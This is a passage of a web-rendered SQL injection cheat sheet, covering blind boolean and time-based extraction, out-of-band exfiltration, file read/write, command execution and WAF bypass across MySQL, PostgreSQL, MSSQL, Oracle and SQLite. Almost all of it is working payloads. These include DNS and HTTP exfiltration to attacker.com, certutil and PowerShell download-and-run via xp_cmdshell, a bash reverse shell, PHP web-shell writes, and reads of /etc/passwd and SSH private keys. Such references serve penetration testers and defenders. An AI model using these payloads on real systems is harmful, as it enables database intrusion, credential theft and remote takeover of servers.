style="color:#75715e">-- </span></span></span></code></pre></div><h3 id="section-5--boolean-based-blind">Section 5 — Boolean-Based Blind</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#75715e">-- Confirm boolean: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND 1=1-- -- true: same as normal response </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">AND</span> <span style="color:#ae81ff">1</span><span style="color:#f92672">=</span><span style="color:#ae81ff">2</span><span style="color:#75715e">-- -- false: different/empty response </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- Extract data char by char: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND SUBSTRING(version(),1,1)=&#39;</span><span style="color:#ae81ff">5</span><span style="color:#e6db74">&#39;-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">AND</span> <span style="color:#66d9ef">SUBSTRING</span>(<span style="color:#66d9ef">version</span>(),<span style="color:#ae81ff">1</span>,<span style="color:#ae81ff">1</span>)<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;8&#39;</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND ASCII(SUBSTRING(version(),1,1))&gt;50-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">AND</span> ASCII(<span style="color:#66d9ef">SUBSTRING</span>(<span style="color:#66d9ef">version</span>(),<span style="color:#ae81ff">1</span>,<span style="color:#ae81ff">1</span>))<span style="color:#f92672">=</span><span style="color:#ae81ff">56</span><span style="color:#75715e">-- -- binary search </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- Extract DB name: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND SUBSTRING(database(),1,1)=&#39;</span>a<span style="color:#e6db74">&#39;-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">AND</span> <span style="color:#66d9ef">LENGTH</span>(<span style="color:#66d9ef">database</span>())<span style="color:#f92672">=</span><span style="color:#ae81ff">5</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- Check if table exists: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND (SELECT COUNT(*) FROM users)&gt;0-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">AND</span> (<span style="color:#66d9ef">SELECT</span> <span style="color:#66d9ef">COUNT</span>(<span style="color:#f92672">*</span>) <span style="color:#66d9ef">FROM</span> information_schema.tables <span style="color:#66d9ef">WHERE</span> <span style="color:#66d9ef">table_name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#39;admin_users&#39;</span>)<span style="color:#f92672">&gt;</span><span style="color:#ae81ff">0</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- Check if row exists: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND (SELECT COUNT(*) FROM users WHERE username=&#39;</span><span style="color:#66d9ef">admin</span><span style="color:#e6db74">&#39;)=1-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- Extract password of admin: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">AND</span> <span style="color:#66d9ef">SUBSTRING</span>((<span style="color:#66d9ef">SELECT</span> password <span style="color:#66d9ef">FROM</span> users <span style="color:#66d9ef">WHERE</span> username<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;admin&#39;</span>),<span style="color:#ae81ff">1</span>,<span style="color:#ae81ff">1</span>)<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;a&#39;</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- PostgreSQL boolean: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND SUBSTR(version(),1,1)=&#39;</span>P<span style="color:#e6db74">&#39;-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">AND</span> (<span style="color:#66d9ef">SELECT</span> <span style="color:#66d9ef">COUNT</span>(<span style="color:#f92672">*</span>) <span style="color:#66d9ef">FROM</span> pg_tables <span style="color:#66d9ef">WHERE</span> tablename<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;users&#39;</span>)<span style="color:#f92672">&gt;</span><span style="color:#ae81ff">0</span><span style="color:#75715e">-- </span></span></span></code></pre></div><h3 id="section-6--time-based-blind">Section 6 — Time-Based Blind</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#75715e">-- MySQL: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND SLEEP(5)-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">AND</span> <span style="color:#66d9ef">IF</span>(<span style="color:#ae81ff">1</span><span style="color:#f92672">=</span><span style="color:#ae81ff">1</span>,SLEEP(<span style="color:#ae81ff">5</span>),<span style="color:#ae81ff">0</span>)<span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND IF(1=2,SLEEP(5),0)-- -- no delay (false) </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">AND</span> <span style="color:#66d9ef">IF</span>(<span style="color:#66d9ef">SUBSTRING</span>(<span style="color:#66d9ef">version</span>(),<span style="color:#ae81ff">1</span>,<span style="color:#ae81ff">1</span>)<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;8&#39;</span>,SLEEP(<span style="color:#ae81ff">5</span>),<span style="color:#ae81ff">0</span>)<span style="color:#75715e">-- -- delay if true </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND IF(LENGTH(database())=10,SLEEP(5),0)-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- PostgreSQL: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span>; <span style="color:#66d9ef">SELECT</span> pg_sleep(<span style="color:#ae81ff">5</span>)<span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND (SELECT 1 FROM pg_sleep(5))-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">AND</span> (<span style="color:#66d9ef">SELECT</span> <span style="color:#66d9ef">CASE</span> <span style="color:#66d9ef">WHEN</span> (<span style="color:#ae81ff">1</span><span style="color:#f92672">=</span><span style="color:#ae81ff">1</span>) <span style="color:#66d9ef">THEN</span> pg_sleep(<span style="color:#ae81ff">5</span>) <span style="color:#66d9ef">ELSE</span> pg_sleep(<span style="color:#ae81ff">0</span>) <span style="color:#66d9ef">END</span>)<span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND (SELECT CASE WHEN SUBSTR(version(),1,1)=&#39;</span>P<span style="color:#e6db74">&#39; THEN pg_sleep(5) ELSE pg_sleep(0) END)-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- MSSQL: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span>; WAITFOR DELAY <span style="color:#e6db74">&#39;0:0:5&#39;</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND IF(1=1) WAITFOR DELAY &#39;</span><span style="color:#ae81ff">0</span>:<span style="color:#ae81ff">0</span>:<span style="color:#ae81ff">5</span><span style="color:#e6db74">&#39;-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span>; <span style="color:#66d9ef">IF</span> (<span style="color:#66d9ef">SELECT</span> <span style="color:#66d9ef">COUNT</span>(<span style="color:#f92672">*</span>) <span style="color:#66d9ef">FROM</span> users)<span style="color:#f92672">&gt;</span><span style="color:#ae81ff">0</span> WAITFOR DELAY <span style="color:#e6db74">&#39;0:0:5&#39;</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- Oracle: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND 1=DBMS_PIPE.RECEIVE_MESSAGE(&#39;</span>a<span style="color:#e6db74">&#39;,5)-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">AND</span> (<span style="color:#66d9ef">SELECT</span> <span style="color:#66d9ef">CASE</span> <span style="color:#66d9ef">WHEN</span> (<span style="color:#ae81ff">1</span><span style="color:#f92672">=</span><span style="color:#ae81ff">1</span>) <span style="color:#66d9ef">THEN</span> DBMS_PIPE.RECEIVE_MESSAGE(<span style="color:#e6db74">&#39;a&#39;</span>,<span style="color:#ae81ff">5</span>) <span style="color:#66d9ef">ELSE</span> <span style="color:#ae81ff">1</span> <span style="color:#66d9ef">END</span> <span style="color:#66d9ef">FROM</span> DUAL)<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- SQLite: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND LIKE(&#39;</span>ABCDEFG<span style="color:#e6db74">&#39;,UPPER(HEX(RANDOMBLOB(100000000/2))))-- -- heavy computation delay </span></span></span></code></pre></div><h3 id="section-7--out-of-band-oob-exfiltration">Section 7 — Out-of-Band (OOB) Exfiltration</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#75715e">-- MySQL (requires FILE privilege): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND LOAD_FILE(concat(&#39;</span><span style="color:#960050;background-color:#1e0010">\\\\</span><span style="color:#e6db74">&#39;,version(),&#39;</span>.<span style="color:#e6db74">&#39;,user(),&#39;</span>.attacker.com<span style="color:#960050;background-color:#1e0010">\\</span><span style="color:#66d9ef">share</span><span style="color:#e6db74">&#39;))-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">AND</span> LOAD_FILE(concat(<span style="color:#ae81ff">0</span>x5c5c5c5c,<span style="color:#66d9ef">version</span>(),<span style="color:#ae81ff">0</span>x2e,<span style="color:#66d9ef">database</span>(),<span style="color:#ae81ff">0</span>x2e,<span style="color:#ae81ff">0</span>x6174746163b6572,<span style="color:#ae81ff">0</span>x2e636f6d5c5c61))<span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- MSSQL (xp_dirtree — DNS OOB): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;; EXEC master..xp_dirtree &#39;</span><span style="color:#960050;background-color:#1e0010">\\</span>attacker.com<span style="color:#960050;background-color:#1e0010">\</span><span style="color:#66d9ef">share</span><span style="color:#e6db74">&#39;-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span>; <span style="color:#66d9ef">EXEC</span> master..xp_fileexist <span style="color:#e6db74">&#39;\\attacker.com\share&#39;</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND 1=(SELECT 1 FROM OPENROWSET(&#39;</span>SQLOLEDB<span style="color:#e6db74">&#39;,&#39;</span>server<span style="color:#f92672">=</span>attacker.com;uid<span style="color:#f92672">=</span>sa;pwd<span style="color:#f92672">=</span>sa<span style="color:#e6db74">&#39;,&#39;</span><span style="color:#66d9ef">SELECT</span> <span style="color:#ae81ff">1</span><span style="color:#e6db74">&#39;))-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- MSSQL (DNS exfil with data): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span>; <span style="color:#66d9ef">DECLARE</span> <span style="color:#f92672">@</span>q NVARCHAR(<span style="color:#ae81ff">1000</span>); <span style="color:#66d9ef">SET</span> <span style="color:#f92672">@</span>q<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;\\&#39;</span><span style="color:#f92672">+@@</span><span style="color:#66d9ef">version</span><span style="color:#f92672">+</span><span style="color:#e6db74">&#39;.attacker.com\share&#39;</span>; <span style="color:#66d9ef">EXEC</span> xp_dirtree <span style="color:#f92672">@</span>q<span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- Oracle (UTL_HTTP): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND 1=(SELECT UTL_HTTP.REQUEST(&#39;</span>http:<span style="color:#f92672">//</span>attacker.com<span style="color:#f92672">/</span><span style="color:#e6db74">&#39;||user) FROM DUAL)-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- Oracle (UTL_FILE / DNS): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">AND</span> <span style="color:#ae81ff">1</span><span style="color:#f92672">=</span>(<span style="color:#66d9ef">SELECT</span> UTL_INADDR.GET_HOST_ADDRESS((<span style="color:#66d9ef">SELECT</span> <span style="color:#66d9ef">user</span> <span style="color:#66d9ef">FROM</span> DUAL)<span style="color:#f92672">||</span><span style="color:#e6db74">&#39;.attacker.com&#39;</span>) <span style="color:#66d9ef">FROM</span> DUAL)<span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- PostgreSQL (COPY): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;; COPY (SELECT version()) TO PROGRAM &#39;</span>curl http:<span style="color:#f92672">//</span>attacker.com<span style="color:#f92672">/?</span>d<span style="color:#f92672">=</span><span style="color:#960050;background-color:#1e0010">$</span>(<span style="color:#66d9ef">version</span>)<span style="color:#e6db74">&#39;-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span>; <span style="color:#66d9ef">CREATE</span> <span style="color:#66d9ef">TABLE</span> tmp(<span style="color:#66d9ef">data</span> text); <span style="color:#66d9ef">COPY</span> tmp <span style="color:#66d9ef">FROM</span> PROGRAM <span style="color:#e6db74">&#39;curl -s http://attacker.com/&#39;</span><span style="color:#75715e">-- </span></span></span></code></pre></div><h3 id="section-8--stacked-queries--file-rw">Section 8 — Stacked Queries &amp; File R/W</h3> <h4 id="mysql-file-readwrite">MySQL File Read/Write</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#75715e">-- Read file (requires FILE privilege): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; UNION SELECT LOAD_FILE(&#39;</span><span style="color:#f92672">/</span>etc<span style="color:#f92672">/</span>passwd<span style="color:#e6db74">&#39;)-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">UNION</span> <span style="color:#66d9ef">SELECT</span> LOAD_FILE(<span style="color:#e6db74">&#39;/var/www/html/config.php&#39;</span>)<span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; UNION SELECT LOAD_FILE(&#39;</span><span style="color:#f92672">/</span>root<span style="color:#f92672">/</span>.ssh<span style="color:#f92672">/</span>id_rsa<span style="color:#e6db74">&#39;)-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- Write file (requires FILE + write permissions): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">UNION</span> <span style="color:#66d9ef">SELECT</span> <span style="color:#e6db74">&#39;&lt;?php system($_GET[&#34;cmd&#34;]);?&gt;&#39;</span> <span style="color:#66d9ef">INTO</span> OUTFILE <span style="color:#e6db74">&#39;/var/www/html/shell.php&#39;</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; UNION SELECT &#39;&#39; INTO DUMPFILE &#39;</span><span style="color:#f92672">/</span>var<span style="color:#f92672">/</span>www<span style="color:#f92672">/</span>html<span style="color:#f92672">/</span>shell.php<span style="color:#e6db74">&#39;-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- Write with newlines encoded: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">UNION</span> <span style="color:#66d9ef">SELECT</span> <span style="color:#ae81ff">0</span>x3c3f7068702073797374656d28245f4745545b22636d64225d293b3f3e <span style="color:#66d9ef">INTO</span> OUTFILE <span style="color:#e6db74">&#39;/var/www/html/shell.php&#39;</span><span style="color:#75715e">-- </span></span></span></code></pre></div><h4 id="mssql-xp_cmdshell">MSSQL xp_cmdshell</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#75715e">-- Enable xp_cmdshell (requires sysadmin): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;; EXEC sp_configure &#39;</span><span style="color:#66d9ef">show</span> advanced <span style="color:#66d9ef">options</span><span style="color:#e6db74">&#39;,1; RECONFIGURE;-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span>; <span style="color:#66d9ef">EXEC</span> sp_configure <span style="color:#e6db74">&#39;xp_cmdshell&#39;</span>,<span style="color:#ae81ff">1</span>; RECONFIGURE;<span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- Execute OS command: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;; EXEC xp_cmdshell &#39;</span>whoami<span style="color:#e6db74">&#39;-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span>; <span style="color:#66d9ef">EXEC</span> xp_cmdshell <span style="color:#e6db74">&#39;certutil -urlcache -split -f http://attacker.com/shell.exe C:\shell.exe &amp;&amp; C:\shell.exe&#39;</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- Read file via xp_cmdshell: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;; EXEC xp_cmdshell &#39;</span><span style="color:#66d9ef">type</span> <span style="color:#66d9ef">C</span>:<span style="color:#960050;background-color:#1e0010">\</span>Windows<span style="color:#960050;background-color:#1e0010">\</span>win.ini<span style="color:#e6db74">&#39;-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- MSSQL reverse shell via PowerShell: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span>; <span style="color:#66d9ef">EXEC</span> xp_cmdshell <span style="color:#e6db74">&#39;powershell -c &#34;iex(New-Object Net.WebClient).DownloadString(&#39;&#39;http://attacker.com/shell.ps1&#39;&#39;)&#34;&#39;</span><span style="color:#75715e">-- </span></span></span></code></pre></div><h4 id="postgresql-rce">PostgreSQL RCE</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#75715e">-- COPY TO PROGRAM (PostgreSQL 9.3+, requires superuser): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;; COPY (SELECT &#39;&#39;) TO PROGRAM &#39;</span>id <span style="color:#f92672">&gt;</span> <span style="color:#f92672">/</span>tmp<span style="color:#f92672">/</span><span style="color:#66d9ef">out</span><span style="color:#e6db74">&#39;-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span>; <span style="color:#66d9ef">COPY</span> (<span style="color:#66d9ef">SELECT</span> <span style="color:#e6db74">&#39;&#39;</span>) <span style="color:#66d9ef">TO</span> PROGRAM <span style="color:#e6db74">&#39;bash -i &gt;&amp; /dev/tcp/attacker.com/4444 0&gt;&amp;1&#39;</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- Large object execution: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;; SELECT lo_import(&#39;</span><span style="color:#f92672">/</span>etc<span style="color:#f92672">/</span>passwd<span style="color:#e6db74">&#39;)-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span>; <span style="color:#66d9ef">SELECT</span> lo_export(<span style="color:#ae81ff">16384</span>,<span style="color:#e6db74">&#39;/var/www/html/shell.php&#39;</span>)<span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- Extension loading (superuser): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;; CREATE EXTENSION IF NOT EXISTS plpython3u;-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span>; <span style="color:#66d9ef">CREATE</span> <span style="color:#66d9ef">OR</span> <span style="color:#66d9ef">REPLACE</span> <span style="color:#66d9ef">FUNCTION</span> sys(cmd TEXT) <span style="color:#66d9ef">RETURNS</span> TEXT <span style="color:#66d9ef">AS</span> <span style="color:#960050;background-color:#1e0010">$$</span> import subprocess; <span style="color:#66d9ef">return</span> subprocess.getoutput(cmd) <span style="color:#960050;background-color:#1e0010">$$</span> <span style="color:#66d9ef">LANGUAGE</span> plpython3u;<span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;; SELECT sys(&#39;</span>id<span style="color:#e6db74">&#39;);-- </span></span></span></code></pre></div><hr> <h3 id="section-9--waf-bypass-techniques">Section 9 — WAF Bypass Techniques</h3> <h4 id="comment-injection-break-keywords">Comment Injection (break keywords)</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#75715e">-- MySQL inline comments: </span></span></span><span style="display:flex;"><span>UN<span style="color:#75715e">/**/</span>ION SEL<span style="color:#75715e">/**/</span>ECT </span></span><span style="display:flex;"><span>UN<span style="color:#75715e">/*!50000ION*/</span> <span style="color:#66d9ef">SELECT</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">UNION</span><span style="color:#75715e">/*bypass*/</span><span style="color:#66d9ef">SELECT</span> </span></span><span style="display:flex;"><span>SEL<span style="color:#75715e">/**/</span>ECT <span style="color:#ae81ff">1</span>,<span style="color:#ae81ff">2</span>,<span style="color:#ae81ff">3</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- Equivalent comments: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;/**/OR/**/1=1-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span><span style="color:#75715e">/*!OR*/</span><span style="color:#ae81ff">1</span><span style="color:#f92672">=</span><span style="color:#ae81ff">1</span><span style="color:#75715e">-- </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- Version-specific bypass: </span></span></span><span style="display:flex;"><span><span style="color:#75715e">/*!UNION*//*!SELECT*/</span><span style="color:#ae81ff">1</span>,<span style="color:#ae81ff">2</span>,<span style="color:#ae81ff">3</span><span style="color:#75715e">-- </span></span></span></code></pre></div><h4 id="case--encoding-bypasses">Case &amp; Encoding Bypasses</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#75715e">-- Case variation: </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">uNiOn</span> <span style="color:#66d9ef">SeLeCt</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">UnIoN</span> <span style="color:#66d9ef">SeLeCT</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">UNION</span><span style="color:#f92672">%</span><span style="color:#ae81ff">20</span><span style="color:#66d9ef">SELECT</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- URL encoding: </span></span></span><span style="display:flex;"><span><span style="color:#f92672">%</span><span style="color:#ae81ff">55</span>NION<span style="color:#f92672">%</span><span style="color:#ae81ff">20</span><span style="color:#f92672">%</span><span style="color:#ae81ff">53</span>ELECT </span></span><span style="display:flex;"><span><span style="color:#66d9ef">UNION</span><span style="color:#f92672">%</span><span style="color:#ae81ff">0</span>aSELECT <span style="color:#75715e">-- newline instead of space </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">UNION</span><span style="color:#f92672">%</span><span style="color:#ae81ff">09</span><span style="color:#66d9ef">SELECT</span> <span style="color:#75715e">-- tab instead of space </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">UNION</span><span style="color:#f92672">%</span><span style="color:#ae81ff">0</span>cSELECT <span style="color:#75715e">-- form feed </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- Double URL encode: </span></span></span><span style="display:flex;"><span><span style="color:#f92672">%</span><span style="color:#ae81ff">2555</span>NION<span style="color:#f92672">%</span><span style="color:#ae81ff">2520</span><span style="color:#66d9ef">SELECT</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- HTML entity (when input reflected in HTML context): </span></span></span><span style="display:flex;"><span><span style="color:#f92672">&amp;#</span><span style="color:#ae81ff">85</span>;NION <span style="color:#f92672">&amp;#</span><span style="color:#ae81ff">83</span>;ELECT </span></span></code></pre></div><h4 id="space-substitution">Space Substitution</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#75715e">-- Replace spaces with: </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">UNION</span><span style="color:#75715e">/**/</span><span style="color:#66d9ef">SELECT</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">UNION</span><span style="color:#f92672">%</span><span style="color:#ae81ff">09</span><span style="color:#66d9ef">SELECT</span> <span style="color:#75715e">-- tab </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">UNION</span><span style="color:#f92672">%</span><span style="color:#ae81ff">0</span>aSELECT <span style="color:#75715e">-- newline </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">UNION</span><span style="color:#f92672">%</span><span style="color:#ae81ff">0</span>cSELECT <span style="color:#75715e">-- form feed </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">UNION</span><span style="color:#f92672">%</span><span style="color:#ae81ff">0</span>dSELECT <span style="color:#75715e">-- carriage return </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">UNION</span><span style="color:#f92672">%</span>a0SELECT <span style="color:#75715e">-- non-breaking space </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">UNION</span>(<span style="color:#ae81ff">1</span>) <span style="color:#75715e">-- parentheses (some contexts) </span></span></span></code></pre></div><h4 id="string-bypass-when-quotes-filtered">String Bypass (when quotes filtered)</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#75715e">-- Hex encoding: </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">SELECT</span> <span style="color:#ae81ff">0</span>x61646d696e <span style="color:#75715e">-- &#39;admin&#39; </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">WHERE</span> username<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>x61646d696e </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- char() function: </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">WHERE</span> username<span style="color:#f92672">=</span>char(<span style="color:#ae81ff">97</span>,<span style="color:#ae81ff">100</span>,<span style="color:#ae81ff">109</span>,<span style="color:#ae81ff">105</span>,<span style="color:#ae81ff">110</span>) <span style="color:#75715e">-- MySQL </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">WHERE</span> username<span style="color:#f92672">=</span>chr(<span style="color:#ae81ff">97</span>)<span style="color:#f92672">||</span>chr(<span style="color:#ae81ff">100</span>)<span style="color:#f92672">||</span>chr(<span style="color:#ae81ff">109</span>)<span style="color:#f92672">||</span>chr(<span style="color:#ae81ff">105</span>)<span style="color:#f92672">||</span>chr(<span style="color:#ae81ff">110</span>) <span style="color:#75715e">-- PostgreSQL/Oracle </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- concat: </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">WHERE</span> 